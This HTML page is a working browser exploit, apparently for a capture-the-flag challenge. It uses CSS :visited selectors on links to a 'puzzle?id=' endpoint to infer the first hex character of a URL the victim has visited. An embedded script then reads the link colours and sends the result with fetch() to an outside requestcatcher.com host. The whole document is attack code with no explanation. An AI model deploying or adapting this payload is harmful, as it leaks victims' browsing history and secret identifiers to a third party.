<!DOCTYPE html>
<html>
<head>
  <style>
    a { color: black; display: block; padding: 5px; }
    
    /* Test first character - each possible hex character */
    a[href^="http://34.146.134.179:3000/puzzle?id=0"]:visited { color: red !important; }
    a[href^="http://34.146.134.179:3000/puzzle?id=1"]:visited { color: red !important; }
    a[href^="http://34.146.134.179:3000/puzzle?id=2"]:visited { color: red !important; }
    a[href^="http://34.146.134.179:3000/puzzle?id=3"]:visited { color: red !important; }
    a[href^="http://34.146.134.179:3000/puzzle?id=4"]:visited { color: red !important; }
    a[href^="http://34.146.134.179:3000/puzzle?id=5"]:visited { color: red !important; }
    a[href^="http://34.146.134.179:3000/puzzle?id=6"]:visited { color: red !important; }
    a[href^="http://34.146.134.179:3000/puzzle?id=7"]:visited { color: red !important; }
    a[href^="http://34.146.134.179:3000/puzzle?id=8"]:visited { color: red !important; }
    a[href^="http://34.146.134.179:3000/puzzle?id=9"]:visited { color: red !important; }
    a[href^="http://34.146.134.179:3000/puzzle?id=a"]:visited { color: red !important; }
    a[href^="http://34.146.134.179:3000/puzzle?id=b"]:visited { color: red !important; }
    a[href^="http://34.146.134.179:3000/puzzle?id=c"]:visited { color: red !important; }
    a[href^="http://34.146.134.179:3000/puzzle?id=d"]:visited { color: red !important; }
    a[href^="http://34.146.134.179:3000/puzzle?id=e"]:visited { color: red !important; }
    a[href^="http://34.146.134.179:3000/puzzle?id=f"]:visited { color: red !important; }
  </style>
</head>
<body>
  <script>
    setTimeout(() => {
      const links = document.querySelectorAll('a');
      let found = '';
      links.forEach(link => {
        if (getComputedStyle(link).color === 'rgb(255, 0, 0)') {
          found = link.textContent;
        }
      });
      fetch(`https://singetu0096.requestcatcher.com/?first_char=${found || 'none'}`);
    }, 1000);
  </script>
  <a href="http://34.146.134.179:3000/puzzle?id=0000000000000000000000000000000000000000">0</a>
  <a href="http://34.146.134.179:3000/puzzle?id=1000000000000000000000000000000000000000">1</a>
  <a href="http://34.146.134.179:3000/puzzle?id=2000000000000000000000000000000000000000">2</a>
  <a href="http://34.146.134.179:3000/puzzle?id=3000000000000000000000000000000000000000">3</a>
  <a href="http://34.146.134.179:3000/puzzle?id=4000000000000000000000000000000000000000">4</a>
  <a href="http://34.146.134.179:3000/puzzle?id=5000000000000000000000000000000000000000">5</a>
  <a href="http://34.146.134.179:3000/puzzle?id=6000000000000000000000000000000000000000">6</a>
  <a href="http://34.146.134.179:3000/puzzle?id=7000000000000000000000000000000000000000">7</a>
  <a href="http://34.146.134.179:3000/puzzle?id=8000000000000000000000000000000000000000">8</a>
  <a href="http://34.146.134.179:3000/puzzle?id=9000000000000000000000000000000000000000">9</a>
  <a href="http://34.146.134.179:3000/puzzle?id=a000000000000000000000000000000000000000">a</a>
  <a href="http://34.146.134.179:3000/puzzle?id=b000000000000000000000000000000000000000">b</a>
  <a href="http://34.146.134.179:3000/puzzle?id=c000000000000000000000000000000000000000">c</a>
  <a href="http://34.146.134.179:3000/puzzle?id=d000000000000000000000000000000000000000">d</a>
  <a href="http://34.146.134.179:3000/puzzle?id=e000000000000000000000000000000000000000">e</a>
  <a href="http://34.146.134.179:3000/puzzle?id=f000000000000000000000000000000000000000">f</a>
</body>
</html>
